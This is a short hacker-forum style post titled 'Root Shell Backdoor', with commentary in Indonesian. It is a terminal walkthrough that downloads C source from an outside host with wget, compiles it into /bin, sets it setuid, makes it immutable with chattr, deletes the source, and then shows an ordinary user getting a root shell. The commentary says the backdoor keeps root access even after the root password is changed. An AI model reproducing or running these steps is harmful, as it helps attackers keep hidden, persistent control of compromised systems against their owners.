Root Shell Backdoor

sh-3.00# cd /bin
sh-3.00# wget trendhoby.com/.ray/rsh.txt
--05:13:12-- http://trendhoby.com/.ray/rsh.txt
=> `rsh.txt'
Resolving trendhoby.com... 219.83.122.166
Connecting to trendhoby.com|219.83.122.166|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 481 [text/plain]

100%[====================================>] 481 --.--K/s

05:13:15 (57.34 MB/s) - `rsh.txt' saved [481/481]

sh-3.00# su
[root@localhost bin]# mv rsh.txt rsh.c
[root@localhost bin]# gcc -o main rsh.c
[root@localhost bin]# chmod gu+s main
[root@localhost bin]# chmod o+x main
[root@localhost bin]# chattr +i main
[root@localhost bin]# rm -f rsh.c
[root@localhost bin]# exit
exit
sh-3.00# exit
exit

[cs-31@localhost local24]$ main

-==[ Root Shell Backdoor ]==-
-==[ Hacker-Newbie Community ]==-
-==[ www.Hacker-Newbie.Org ]==-

Starting Interactive Shell...
Session Started. Enjoy the hack !!

[root@localhost local24]#

[root@localhost local24]# id;whoami
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
root
[root@localhost local24]#


fungsinya sama dengan shell (backdoor)

jadi login sebagai user terus tinggal ketik main enter langsung jadi root
hehehe begitu

kalo seumpama rootnya udah di ganti password tapi kita bisa masuk sebagai user saja

kita masih bisa akses sebagai root